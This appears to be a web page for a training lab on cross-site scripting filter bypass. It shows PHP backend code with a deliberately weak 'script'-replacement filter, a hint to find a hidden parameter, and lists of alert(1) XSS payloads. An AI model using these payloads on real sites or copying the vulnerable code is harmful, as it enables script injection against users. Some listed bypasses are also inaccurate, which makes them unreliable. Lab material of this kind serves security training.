Mixed Filtering XSS Lab

Test XSS with different filtering approaches in the same application

Mixed Filtering Challenge

Lab Overview

This lab demonstrates mixed security implementations where different parameters use different filtering approaches, creating a complex security landscape.

Mixed Implementation: The application uses different security controls for different parameters, creating potential security gaps.
Hidden Parameter: There's a hidden parameter not shown in the main form. Use tools like Arjun to discover it!
# use arjun tool to find hidden parameter
Parameter Security Levels:
Secure fname - Uses htmlspecialchars()
Partial Filter lname - Replaces 'script' with '/'
Secure ptu - Uses htmlspecialchars()
Mixed Different filters for different parameters
Filter Demonstration:
Input: <script>alert(1)</script>
After lname filter: </>alert(1)</>
The 'script' string is replaced with '/', which can create interesting bypass opportunities.
Overall Security Level: Inconsistent Implementation

Objective: Test XSS payloads against the mixed filtering implementation and find ways to bypass the partial filter in the lname parameter.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    $re = str_replace('script', '/', $_GET['lname']);
    echo $re;
}
elseif(isset($_GET["ptu"])){
    echo htmlspecialchars($_GET["ptu"], ENT_QUOTES);
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (Mixed Filtering)
This parameter uses htmlspecialchars() encoding
This parameter replaces 'script' with '/' (case-sensitive)
Hidden Parameter
Hint: The 'ptu' parameter is not shown in the main form but is implemented in the backend.
This parameter uses htmlspecialchars() encoding
Bypass Techniques for Partial Filter
Case Variation Bypasses:
  • <SCRIPT>alert(1)</SCRIPT> - Uppercase
  • <Script>alert(1)</Script> - Capitalized
  • <ScRiPt>alert(1)</ScRiPt> - Mixed case
Alternative Tag Vectors:
  • <img src=x onerror=alert(1)> - Image error handler
  • <body onload=alert(1)> - Body load event
  • <svg onload=alert(1)> - SVG load event
Replacement Filter Exploitation:
  • <scrscriptipt>alert(1)</scrscriptipt> - Double writing
  • <scr/ipt>alert(1)</scr/ipt> - Using the replacement character
  • <scr"+"ipt>alert(1)</scr"+"ipt> - String concatenation
  • Try payloads where 'script' becomes valid HTML after replacement
Security Implications

Mixed filtering implementations create:

  • Inconsistent security controls across the application
  • False sense of security from partial filtering
  • Complex attack surface with different bypass techniques
  • Maintenance challenges for security teams
  • Difficulty in comprehensive security testing
  • Potential for overlooked vulnerabilities
Best Practices

For consistent security:

  • Use uniform output encoding across all parameters
  • Avoid partial or incomplete filtering
  • Implement Content Security Policy (CSP) headers
  • Use context-aware encoding for different output contexts
  • Conduct comprehensive security testing
  • Document all security controls and implementations
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
Advanced Bypass Examples
Replacement Exploitation:
  • <scrscriptipt>alert(1)</scrscriptipt>
  • <scr/ipt>alert(1)</scr/ipt>
  • scrscriptipt:alert(1) - For JavaScript URLs
Alternative Execution Methods:
  • <img src=x onerror=alert(1)>
  • <svg onload=alert(1)>
  • <iframe src="javascript:alert(1)">
  • <object data="data:text/html,<script>alert(1)</script>">
Creative Bypass Techniques:
  • Use HTML entities: <script>alert(1)</script>
  • Use Unicode: <scr\u0069pt>alert(1)</scr\u0069pt>
  • Use data URIs: <object data="data:text/html,<script>alert(1)</script>">
  • Use JavaScript pseudo-protocol: javascript:alert(1)